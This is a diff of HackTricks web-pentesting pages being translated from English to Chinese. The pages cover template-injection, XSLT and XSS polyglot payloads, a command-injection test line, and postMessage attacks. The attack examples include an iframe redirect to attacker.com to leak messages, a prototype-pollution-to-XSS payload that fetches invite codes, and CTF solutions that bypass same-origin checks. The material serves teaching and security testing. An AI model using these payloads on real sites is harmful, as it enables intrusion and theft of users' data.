 {{7*7}}
@@ -180,40 +155,30 @@ ${7*7}
 ${{7*7}}
 #{7*7}
 ```
-
-### Polygloths
-
+### 多语言者
 ```python
 {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
 ```
+## [XSLT 服务器端注入](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
 
-## [XSLT Server Side Injection](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
-
-### Basic Tests
-
+### 基本测试
 ```markup
 <xsl:value-of select="system-property('xsl:version')" />
 <esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
 ```
-
-### Polygloths
-
+### 多语言者
 ```markup
 <xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
 ```
-
 ## XSS
 
-### Basic Tests
-
+### 基本测试
 ```markup
 " onclick=alert() a="
 '"><img src=x onerror=alert(1) />
 javascript:alert()
 ```
-
-### Polygloths
-
+### 多语言者
 ```markup
 javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
 -->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
@@ -241,6 +206,4 @@ javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></
 javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
 javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md b/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md
index d84b3291e..33fe7675c 100644
--- a/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md
+++ b/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md
@@ -1,7 +1,6 @@
 # Web Vulns List
 
 {{#include ../../banners/hacktricks-training.md}}
-
 ```python
 {{7*7}}[7*7]
 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
@@ -41,6 +40,4 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
 " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
 ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/postmessage-vulnerabilities/README.md b/src/pentesting-web/postmessage-vulnerabilities/README.md
index 64b587a5b..c19921ba1 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/README.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/README.md
@@ -1,13 +1,12 @@
-# PostMessage Vulnerabilities
+# PostMessage 漏洞
 
-## PostMessage Vulnerabilities
+## PostMessage 漏洞
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Send **PostMessage**
-
-**PostMessage** uses the following function to send a message:
+## 发送 **PostMessage**
 
+**PostMessage** 使用以下函数发送消息：
 ```bash
 targetWindow.postMessage(message, targetOrigin, [transfer]);
 
@@ -33,208 +32,196 @@ win = open('URL-with-iframe-inside', 'hack', 'width=800,height=300,top=500');
 ## loop until win.length == 1 (until the iframe is loaded)
 win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
 ```
+注意，**targetOrigin** 可以是 '\*' 或像 _https://company.com_ 这样的 URL。\
+在 **第二种情况** 中，**消息只能发送到该域**（即使窗口对象的来源不同）。\
+如果使用 **通配符**，**消息可以发送到任何域**，并将发送到窗口对象的来源。
 
-Note that **targetOrigin** can be a '\*' or an URL like _https://company.com._\
-In the **second scenario**, the **message can only be sent to that domain** (even if the origin of the window object is different).\
-If the **wildcard** is used, **messages could be sent to any domain**, and will be sent to the origin of the Window object.
-
-### Attacking iframe & wildcard in **targetOrigin**
-
-As explained in [**this report**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) if you find a page that can be **iframed** (no `X-Frame-Header` protection) and that is **sending sensitive** message via **postMessage** using a **wildcard** (\*), you can **modify** the **origin** of the **iframe** and **leak** the **sensitive** message to a domain controlled by you.\
-Note that if the page can be iframed but the **targetOrigin** is **set to a URL and not to a wildcard**, this **trick won't work**.
+### 攻击 iframe 和 **targetOrigin** 中的通配符
 
+正如在 [**这份报告**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) 中所解释的，如果你发现一个可以被 **iframed** 的页面（没有 `X-Frame-Header` 保护）并且该页面通过 **postMessage** 使用 **通配符** (\*) 发送 **敏感** 消息，你可以 **修改** **iframe** 的 **来源** 并将 **敏感** 消息泄露到你控制的域。\
+请注意，如果页面可以被 iframed，但 **targetOrigin** 被 **设置为一个 URL 而不是通配符**，这个 **技巧将不起作用**。
 ```markup
 <html>
-   <iframe src="https://docs.google.com/document/ID" />
-   <script>
-      setTimeout(exp, 6000); //Wait 6s
+<iframe src="https://docs.google.com/document/ID" />
+<script>
+setTimeout(exp, 6000); //Wait 6s
 
-      //Try to change the origin of the iframe each 100ms
-      function exp(){
-          setInterval(function(){
-              window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
-          }, 100);
-      }
-   </script>
+//Try to change the origin of the iframe each 100ms
+function exp(){
+setInterval(function(){
+window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
+}, 100);
+}
+</script>
 ```
+## addEventListener 利用
 
-## addEventListener exploitation
-
-**`addEventListener`** is the function used by JS to declare the function that is **expecting `postMessages`**.\
-A code similar to the following one will be used:
-
+**`addEventListener`** 是 JS 用于声明 **期望 `postMessages`** 的函数。\
+将使用类似以下的代码：
 ```javascript
 window.addEventListener(
-  "message",
-  (event) => {
-    if (event.origin !== "http://example.org:8080") return
+"message",
+(event) => {
+if (event.origin !== "http://example.org:8080") return
 
-    // ...
-  },
-  false
+// ...
+},
+false
 )
 ```
+注意在这种情况下，代码的**第一件事**是**检查来源**。这非常**重要**，特别是如果页面将对接收到的信息进行**任何敏感**操作（例如更改密码）。**如果不检查来源，攻击者可以让受害者向这些端点发送任意数据**并更改受害者的密码（在这个例子中）。
 
-Note in this case how the **first thing** that the code is doing is **checking the origin**. This is terribly **important** mainly if the page is going to do **anything sensitive** with the received information (like changing a password). **If it doesn't check the origin, attackers can make victims send arbitrary data to this endpoints** and change the victims passwords (in this example).
+### 枚举
 
-### Enumeration
+为了**查找当前页面中的事件监听器**，你可以：
 
-In order to **find event listeners** in the current page you can:
-
-- **Search** the JS code for `window.addEventListener` and `$(window).on` (_JQuery version_)
-- **Execute** in the developer tools console: `getEventListeners(window)`
+- **搜索** JS 代码中的 `window.addEventListener` 和 `$(window).on` (_JQuery 版本_)
+- **在** 开发者工具控制台中执行：`getEventListeners(window)`
 
 ![](<../../images/image (618) (1).png>)
 
-- **Go to** _Elements --> Event Listeners_ in the developer tools of the browser
+- **在** 浏览器的开发者工具中**转到** _Elements --> Event Listeners_
 
 ![](<../../images/image (396).png>)
 
-- Use a **browser extension** like [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) or [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker). This browser extensions will **intercept all the messages** and show them to you.
+- 使用一个**浏览器扩展**，如 [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) 或 [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker)。这些浏览器扩展将**拦截所有消息**并显示给你。
 
-### Origin check bypasses
+### 来源检查绕过
 
-- **`event.isTrusted`** attribute is considered secure as it returns `True` only for events that are generated by genuine user actions. Though it's challenging to bypass if implemented correctly, its significance in security checks is notable.
-- The use of **`indexOf()`** for origin validation in PostMessage events may be susceptible to bypassing. An example illustrating this vulnerability is:
+- **`event.isTrusted`** 属性被认为是安全的，因为它仅对由真实用户操作生成的事件返回 `True`。尽管如果正确实现，绕过它是具有挑战性的，但它在安全检查中的重要性是显著的。
+- 在 PostMessage 事件中使用 **`indexOf()`** 进行来源验证可能容易被绕过。一个说明此漏洞的示例是：
 
-  ```javascript
-  "https://app-sj17.marketo.com".indexOf("https://app-sj17.ma")
-  ```
+```javascript
+"https://app-sj17.marketo.com".indexOf("https://app-sj17.ma")
+```
 
-- The **`search()`** method from `String.prototype.search()` is intended for regular expressions, not strings. Passing anything other than a regexp leads to implicit conversion to regex, making the method potentially insecure. This is because in regex, a dot (.) acts as a wildcard, allowing for bypassing of validation with specially crafted domains. For instance:
+- **`search()`** 方法来自 `String.prototype.search()`，旨在用于正则表达式，而不是字符串。传递任何非正则表达式的内容会导致隐式转换为正则表达式，使该方法可能不安全。这是因为在正则表达式中，点（.）作为通配符，允许通过特殊构造的域绕过验证。例如：
 
-  ```javascript
-  "https://www.safedomain.com".search("www.s.fedomain.com")
-  ```
+```javascript
+"https://www.safedomain.com".search("www.s.fedomain.com")
+```
 
-- The **`match()`** function, similar to `search()`, processes regex. If the regex is improperly structured, it might be prone to bypassing.
-- The **`escapeHtml`** function is intended to sanitize inputs by escaping characters. However, it does not create a new escaped object but overwrites the properties of the existing object. This behavior can be exploited. Particularly, if an object can be manipulated such that its controlled property does not acknowledge `hasOwnProperty`, the `escapeHtml` won't perform as expected. This is demonstrated in the examples below:
+- **`match()`** 函数与 `search()` 类似，处理正则表达式。如果正则表达式结构不当，可能容易被绕过。
+- **`escapeHtml`** 函数旨在通过转义字符来清理输入。然而，它并不创建一个新的转义对象，而是覆盖现有对象的属性。这种行为可以被利用。特别是，如果一个对象可以被操控，使其受控属性不承认 `hasOwnProperty`，则 `escapeHtml` 将无法按预期执行。以下示例演示了这一点：
 
-  - Expected Failure:
+- 预期失败：
 
-    ```javascript
-    result = u({
-      message: "'\"<b>\\",
-    })
-    result.message // "&#39;&quot;&lt;b&gt;\"
-    ```
+```javascript
+result = u({
+message: "'\"<b>\\",
+})
+result.message // "&#39;&quot;&lt;b&gt;\"
+```
 
-  - Bypassing the escape:
+- 绕过转义：
 
-    ```javascript
-    result = u(new Error("'\"<b>\\"))
-    result.message // "'"<b>\"
-    ```
+```javascript
+result = u(new Error("'\"<b>\\"))
+result.message // "'"<b>\"
+```
 
-  In the context of this vulnerability, the `File` object is notably exploitable due to its read-only `name` property. This property, when used in templates, is not sanitized by the `escapeHtml` function, leading to potential security risks.
+在此漏洞的背景下，`File` 对象因其只读的 `name` 属性而特别容易被利用。该属性在模板中使用时，未被 `escapeHtml` 函数清理，导致潜在的安全风险。
 
-- The `document.domain` property in JavaScript can be set by a script to shorten the domain, allowing for more relaxed same-origin policy enforcement within the same parent domain.
+- JavaScript 中的 `document.domain` 属性可以由脚本设置以缩短域名，从而允许在同一父域内更宽松的同源策略执行。
 
-### e.origin == window.origin bypass
+### e.origin == window.origin 绕过
 
-When embedding a web page within a **sandboxed iframe** using %%%%%%, it's crucial to understand that the iframe's origin will be set to null. This is particularly important when dealing with **sandbox attributes** and their implications on security and functionality.
+在使用 %%%%%% 嵌入一个**沙箱 iframe** 时，必须理解 iframe 的来源将被设置为 null。这在处理**沙箱属性**及其对安全性和功能的影响时尤为重要。
 
-By specifying **`allow-popups`** in the sandbox attribute, any popup window opened from within the iframe inherits the sandbox restrictions of its parent. This means that unless the **`allow-popups-to-escape-sandbox`** attribute is also included, the popup window's origin is similarly set to `null`, aligning with the iframe's origin.
+通过在沙箱属性中指定 **`allow-popups`**，从 iframe 内部打开的任何弹出窗口都继承其父级的沙箱限制。这意味着，除非还包括 **`allow-popups-to-escape-sandbox`** 属性，否则弹出窗口的来源也被设置为 `null`，与 iframe 的来源一致。
 
-Consequently, when a popup is opened under these conditions and a message is sent from the iframe to the popup using **`postMessage`**, both the sending and receiving ends have their origins set to `null`. This situation leads to a scenario where **`e.origin == window.origin`** evaluates to true (`null == null`), because both the iframe and the popup share the same origin value of `null`.
+因此，当在这些条件下打开弹出窗口并使用 **`postMessage`** 从 iframe 向弹出窗口发送消息时，发送和接收端的来源都被设置为 `null`。这种情况导致 **`e.origin == window.origin`** 评估为 true (`null == null`)，因为 iframe 和弹出窗口共享相同的来源值 `null`。
 
-For more information **read**:
+有关更多信息**请阅读**：
 
 {{#ref}}
 bypassing-sop-with-iframes-1.md
 {{#endref}}
 
-### Bypassing e.source
-
-It's possible to check if the message came from the same window the script is listening in (specially interesting for **Content Scripts from browser extensions** to check if the message was sent from the same page):
+### 绕过 e.source
 
+可以检查消息是否来自脚本正在监听的同一窗口（特别有趣的是**来自浏览器扩展的内容脚本**，以检查消息是否来自同一页面）：
 ```javascript
 // If it’s not, return immediately.
 if (received_message.source !== window) {
-  return
+return
 }
 ```
+您可以通过创建一个**iframe**，使其**发送****postMessage**并**立即删除**，来强制**`e.source`**的消息为null。
 
-You can force **`e.source`** of a message to be null by creating an **iframe** that **sends** the **postMessage** and is **immediately deleted**.
-
-For more information **read:**
+有关更多信息**请阅读：**
 
 {{#ref}}
 bypassing-sop-with-iframes-2.md
 {{#endref}}
 
-### X-Frame-Header bypass
-
-In order to perform these attacks ideally you will be able to **put the victim web page** inside an `iframe`. But some headers like `X-Frame-Header` can **prevent** that **behaviour**.\
-In those scenarios you can still use a less stealthy attack. You can open a new tab to the vulnerable web application and communicate with it:
+### X-Frame-Header 绕过
 
+为了理想地执行这些攻击，您将能够**将受害者网页**放入一个`iframe`中。但一些头部如`X-Frame-Header`可以**阻止**这种**行为**。\
+在这些情况下，您仍然可以使用一种不太隐蔽的攻击。您可以打开一个新标签页到易受攻击的网络应用程序并与之通信：
 ```markup
 <script>
 var w=window.open("<url>")
 setTimeout(function(){w.postMessage('text here','*');}, 2000);
 </script>
 ```
+### 通过阻止主页面窃取发送给子页面的消息
 
-### Stealing message sent to child by blocking the main page
-
-In the following page you can see how you could steal a **sensitive postmessage data** sent to a **child iframe** by **blocking** the **main** page before sending the data and abusing a **XSS in the child** to **leak the data** before it's received:
+在以下页面中，您可以看到如何通过在发送数据之前**阻止**主页面来窃取发送给**子iframe**的**敏感postmessage数据**，并利用**子iframe中的XSS**在数据被接收之前**泄露数据**：
 
 {{#ref}}
 blocking-main-page-to-steal-postmessage.md
 {{#endref}}
 
-### Stealing message by modifying iframe location
+### 通过修改iframe位置窃取消息
 
-If you can iframe a webpage without X-Frame-Header that contains another iframe, you can **change the location of that child iframe**, so if it's receiving a **postmessage** sent using a **wildcard**, an attacker could **change** that iframe **origin** to a page **controlled** by him and **steal** the message:
+如果您可以在没有X-Frame-Header的网页中嵌入一个包含另一个iframe的页面，您可以**更改该子iframe的地址**，因此如果它接收使用**通配符**发送的**postmessage**，攻击者可以**更改**该iframe的**来源**为一个**由他控制**的页面并**窃取**消息：
 
 {{#ref}}
 steal-postmessage-modifying-iframe-location.md
 {{#endref}}
 
-### postMessage to Prototype Pollution and/or XSS
+### postMessage导致原型污染和/或XSS
 
-In scenarios where the data sent through `postMessage` is executed by JS, you can **iframe** the **page** and **exploit** the **prototype pollution/XSS** sending the exploit via `postMessage`.
+在通过`postMessage`发送的数据被JS执行的场景中，您可以**嵌入**该**页面**并**利用**通过`postMessage`发送的**原型污染/XSS**进行攻击。
 
-A couple of **very good explained XSS though `postMessage`** can be found in [https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html)
-
-Example of an exploit to abuse **Prototype Pollution and then XSS** through a `postMessage` to an `iframe`:
+一些**通过`postMessage`非常好地解释的XSS**可以在 [https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html) 找到。
 
+通过`postMessage`对`iframe`进行**原型污染然后XSS**的攻击示例：
 ```html
 <html>
-  <body>
-    <iframe
-      id="idframe"
-      src="http://127.0.0.1:21501/snippets/demo-3/embed"></iframe>
-    <script>
-      function get_code() {
-        document
-          .getElementById("iframe_victim")
-          .contentWindow.postMessage(
-            '{"__proto__":{"editedbymod":{"username":"<img src=x onerror=\\"fetch(\'http://127.0.0.1:21501/api/invitecodes\', {credentials: \'same-origin\'}).then(response => response.json()).then(data => {alert(data[\'result\'][0][\'code\']);})\\" />"}}}',
-            "*"
-          )
-        document
-          .getElementById("iframe_victim")
-          .contentWindow.postMessage(JSON.stringify("refresh"), "*")
-      }
+<body>
+<iframe
+id="idframe"
+src="http://127.0.0.1:21501/snippets/demo-3/embed"></iframe>
+<script>
+function get_code() {
+document
+.getElementById("iframe_victim")
+.contentWindow.postMessage(
+'{"__proto__":{"editedbymod":{"username":"<img src=x onerror=\\"fetch(\'http://127.0.0.1:21501/api/invitecodes\', {credentials: \'same-origin\'}).then(response => response.json()).then(data => {alert(data[\'result\'][0][\'code\']);})\\" />"}}}',
+"*"
+)
+document
+.getElementById("iframe_victim")
+.contentWindow.postMessage(JSON.stringify("refresh"), "*")
+}
 
-      setTimeout(get_code, 2000)
-    </script>
-  </body>
+setTimeout(get_code, 2000)
+</script>
+</body>
 </html>
 ```
+有关**更多信息**：
 
-For **more information**:
+- 链接到关于[**原型污染**](../deserialization/nodejs-proto-prototype-pollution/)的页面
+- 链接到关于[**XSS**](../xss-cross-site-scripting/)的页面
+- 链接到关于[**客户端原型污染到XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)的页面
 
-- Link to page about [**prototype pollution**](../deserialization/nodejs-proto-prototype-pollution/)
-- Link to page about [**XSS**](../xss-cross-site-scripting/)
-- Link to page about [**client side prototype pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
-
-## References
+## 参考文献
 
 - [https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html)
 - [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
-- To practice: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
+- 练习：[https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md b/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md
index 475b43fb3..7b87dd0e7 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md
@@ -1,35 +1,30 @@
-# Blocking main page to steal postmessage
+# 阻止主页面以窃取 postmessage
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Winning RCs with Iframes
+## 使用 Iframes 赢得 RCs
 
-According to this [**Terjanq writeup**](https://gist.github.com/terjanq/7c1a71b83db5e02253c218765f96a710) blob documents created from null origins are isolated for security benefits, which means that if you maintain busy the main page, the iframe page is going to be executed.
+根据这个 [**Terjanq writeup**](https://gist.github.com/terjanq/7c1a71b83db5e02253c218765f96a710)，从空源创建的 blob 文档出于安全考虑是隔离的，这意味着如果你让主页面保持忙碌，iframe 页面将会被执行。
 
-Basically in that challenge an **isolated iframe is executed** and right **after** it's **loaded** the **parent** page is going to **send a post** message with the **flag**.\
-However, that postmessage communication is **vulnerable to XSS** (the **iframe** can execute JS code).
+基本上，在这个挑战中，一个 **隔离的 iframe 被执行**，并且在它 **加载后**，**父**页面将会 **发送一个 post** 消息，包含 **标志**。\
+然而，这种 postmessage 通信是 **易受 XSS 攻击的**（**iframe** 可以执行 JS 代码）。
 
-Therefore, the goal of the attacker is to **let the parent create the iframe**, but **before** let the **parent** page **send** the sensitive data (**flag**) **keep it busy** and send the **payload to the iframe**. While the **parent is busy** the **iframe executes the payload** which will be some JS that will listen for the **parent postmessage message and leak the flag**.\
-Finally, the iframe has executed the payload and the parent page stops being busy, so it sends the flag and the payload leaks it.
-
-But how could you make the parent be **busy right after it generated the iframe and just while it's waiting for the iframe to be ready to send the sensitive data?** Basically, you need to find **async** **action** you could make the parent **execute**. For example, in that challenge the parent was **listening** to **postmessages** like this:
+因此，攻击者的目标是 **让父页面创建 iframe**，但 **在** 让 **父**页面 **发送** 敏感数据（**标志**）之前 **保持它忙碌**，并将 **有效载荷发送到 iframe**。当 **父页面忙碌时**，**iframe 执行有效载荷**，这将是一些 JS 代码，用于监听 **父 postmessage 消息并泄露标志**。\
+最后，iframe 执行了有效载荷，父页面停止忙碌，因此它发送标志，而有效载荷泄露了它。
 
+但是你如何能让父页面在生成 iframe 后 **立即忙碌，并且在等待 iframe 准备好发送敏感数据时保持忙碌呢？** 基本上，你需要找到 **异步** **操作**，让父页面 **执行**。例如，在这个挑战中，父页面 **监听** **postmessages**，如下所示：
 ```javascript
 window.addEventListener("message", (e) => {
-  if (e.data == "blob loaded") {
-    $("#previewModal").modal()
-  }
+if (e.data == "blob loaded") {
+$("#previewModal").modal()
+}
 })
 ```
-
-so it was possible to send a **big integer in a postmessage** that will be **converted to string** in that comparison, which will take some time:
-
+因此，可以在 postmessage 中发送一个 **大整数**，在该比较中将被 **转换为字符串**，这将需要一些时间：
 ```bash
 const buffer = new Uint8Array(1e7);
 win?.postMessage(buffer, '*', [buffer.buffer]);
 ```
-
-And in order to be precise and **send** that **postmessage** just **after** the **iframe** is created but **before** it's **ready** to receive the data from the parent, you will need to **play with the miliseconds of a `setTimeout`**.
+为了精确地**发送**该**postmessage**，在**iframe**创建后但在其**准备好**接收来自父级的数据之前，您需要**调整`setTimeout`的毫秒数**。 
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
index 3212e6a12..003cf4083 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
@@ -4,74 +4,69 @@
 
 ## Iframes in SOP-1
 
-In this [**challenge**](https://github.com/terjanq/same-origin-xss) created by [**NDevTK**](https://github.com/NDevTK) and [**Terjanq**](https://github.com/terjanq) you need you need to exploit a XSS in the coded
-
+在这个[**挑战**](https://github.com/terjanq/same-origin-xss)中，由[**NDevTK**](https://github.com/NDevTK)和[**Terjanq**](https://github.com/terjanq)创建，你需要利用编码中的XSS进行攻击。
 ```javascript
 const identifier = "4a600cd2d4f9aa1cfb5aa786"
 onmessage = (e) => {
-  const data = e.data
-  if (e.origin !== window.origin && data.identifier !== identifier) return
-  if (data.type === "render") {
-    renderContainer.innerHTML = data.body
-  }
+const data = e.data
+if (e.origin !== window.origin && data.identifier !== identifier) return
+if (data.type === "render") {
+renderContainer.innerHTML = data.body
+}
 }
 ```
+主要问题是[**主页面**](https://so-xss.terjanq.me)使用DomPurify发送`data.body`，因此为了将自己的html数据发送到该代码中，需要**绕过**`e.origin !== window.origin`。
 
-The main problem is that the [**main page**](https://so-xss.terjanq.me) uses DomPurify to send the `data.body`, so in order to send your own html data to that code you need to **bypass** `e.origin !== window.origin`.
+让我们看看他们提出的解决方案。
 
-Let's see the solution they propose.
+### SOP 绕过 1 (e.origin === null)
 
-### SOP bypass 1 (e.origin === null)
+当`//example.org`嵌入到一个**沙箱iframe**中时，页面的**origin**将是**`null`**，即**`window.origin === null`**。因此，仅通过`<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">`嵌入iframe，我们可以**强制`null` origin**。
 
-When `//example.org` is embedded into a **sandboxed iframe**, then the page's **origin** will be **`null`**, i.e. **`window.origin === null`**. So just by embedding the iframe via `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` we could **force the `null` origin**.
+如果页面是**可嵌入的**，你可以通过这种方式绕过该保护（cookies可能也需要设置为`SameSite=None`）。
 
-If the page was **embeddable** you could bypass that protection that way (cookies might also need to be set to `SameSite=None`).
+### SOP 绕过 2 (window.origin === null)
 
-### SOP bypass 2 (window.origin === null)
+较少人知的是，当**沙箱值`allow-popups`被设置**时，**打开的弹出窗口**将**继承**所有**沙箱属性**，除非设置`allow-popups-to-escape-sandbox`。\
+因此，从**null origin**打开**弹出窗口**将使**弹出窗口内的`window.origin`**也为**`null`**。
 
-The lesser known fact is that when the **sandbox value `allow-popups` is set** then the **opened popup** will **inherit** all the **sandboxed attributes** unless `allow-popups-to-escape-sandbox` is set.\
-So, opening a **popup** from a **null origin** will make **`window.origin`** inside the popup also **`null`**.
+### 挑战解决方案
 
-### Challenge Solution
-
-Therefore, for this challenge, one could **create** an **iframe**, **open a popup** to the page with the vulnerable XSS code handler (`/iframe.php`), as `window.origin === e.origin` because both are `null` it's possible to **send a payload that will exploit the XSS**.
-
-That **payload** will get the **identifier** and send a **XSS** it **back to the top page** (the page that open the popup), **which** will **change location** to the **vulnerable** `/iframe.php`. Because the identifier is known, it doesn't matter that the condition `window.origin === e.origin` is not satisfied (remember, the origin is the **popup** from the iframe which has **origin** **`null`**) because `data.identifier === identifier`. Then, the **XSS will trigger again**, this time in the correct origin.
+因此，对于这个挑战，可以**创建**一个**iframe**，**打开一个弹出窗口**到具有易受攻击的XSS代码处理程序的页面(`/iframe.php`)，因为`window.origin === e.origin`因为两者都是`null`，可以**发送一个有效载荷来利用XSS**。
 
+该**有效载荷**将获取**标识符**并将**XSS**发送**回顶部页面**（打开弹出窗口的页面），**这将**使**位置**更改为**易受攻击的**`/iframe.php`。因为标识符是已知的，所以不管条件`window.origin === e.origin`是否满足都无关紧要（记住，origin是来自iframe的**弹出窗口**，其**origin**为**`null`**），因为`data.identifier === identifier`。然后，**XSS将再次触发**，这次在正确的origin中。
 ```html
 <body>
-  <script>
-    f = document.createElement("iframe")
+<script>
+f = document.createElement("iframe")
 
-    // Needed flags
-    f.sandbox = "allow-scripts allow-popups allow-top-navigation"
+// Needed flags
+f.sandbox = "allow-scripts allow-popups allow-top-navigation"
 
-    // Second communication with /iframe.php (this is the top page relocated)
-    // This will execute the alert in the correct origin
-    const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
-      x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');
-    },1000);`.replaceAll("\n", " ")
+// Second communication with /iframe.php (this is the top page relocated)
+// This will execute the alert in the correct origin
+const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
+x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');
+},1000);`.replaceAll("\n", " ")
 
-    // Initial communication
-    // Open /iframe.php in a popup, both iframes and popup will have "null" as origin
-    // Then, bypass window.origin === e.origin to steal the identifier and communicate
-    // with the top with the second XSS payload
-    f.srcdoc = `
-    <h1>Click me!</h1>
-    <script>
-      onclick = e => {
-        let w = open('https://so-xss.terjanq.me/iframe.php');
-        onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';
-        setTimeout(_ => {
-          w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')
-        }, 1000);
-      };
-    <\/script>
-    `
-    document.body.appendChild(f)
-  </script>
+// Initial communication
+// Open /iframe.php in a popup, both iframes and popup will have "null" as origin
+// Then, bypass window.origin === e.origin to steal the identifier and communicate
+// with the top with the second XSS payload
+f.srcdoc = `
+<h1>Click me!</h1>
+<script>
+onclick = e => {
+let w = open('https://so-xss.terjanq.me/iframe.php');
+onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';
+setTimeout(_ => {
+w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')
+}, 1000);
+};
+<\/script>
+`
+document.body.appendChild(f)
+</script>
 </body>
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
index c22bbfa8a..8284a6bd4 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
@@ -4,22 +4,19 @@
 
 ## Iframes in SOP-2
 
-In the [**solution**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc/solution) for this [**challenge**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc)**,** [**@Strellic\_**](https://twitter.com/Strellic_) proposes a similar method to the previous section. Let's check it.
-
-In this challenge the attacker needs to **bypass** this:
+在这个[**解决方案**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc/solution)中，针对这个[**挑战**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc)**，** [**@Strellic\_**](https://twitter.com/Strellic_) 提出了与前一部分类似的方法。让我们来看看。
 
+在这个挑战中，攻击者需要**绕过**这个：
 ```javascript
 if (e.source == window.calc.contentWindow && e.data.token == window.token) {
 ```
+如果他这样做，他可以发送一个 **postmessage**，其中包含将被写入页面的 HTML 内容，使用 **`innerHTML`** 而不进行清理 (**XSS**)。
 
-If he does, he can send a **postmessage** with HTML content that is going to be written in the page with **`innerHTML`** without sanitation (**XSS**).
-
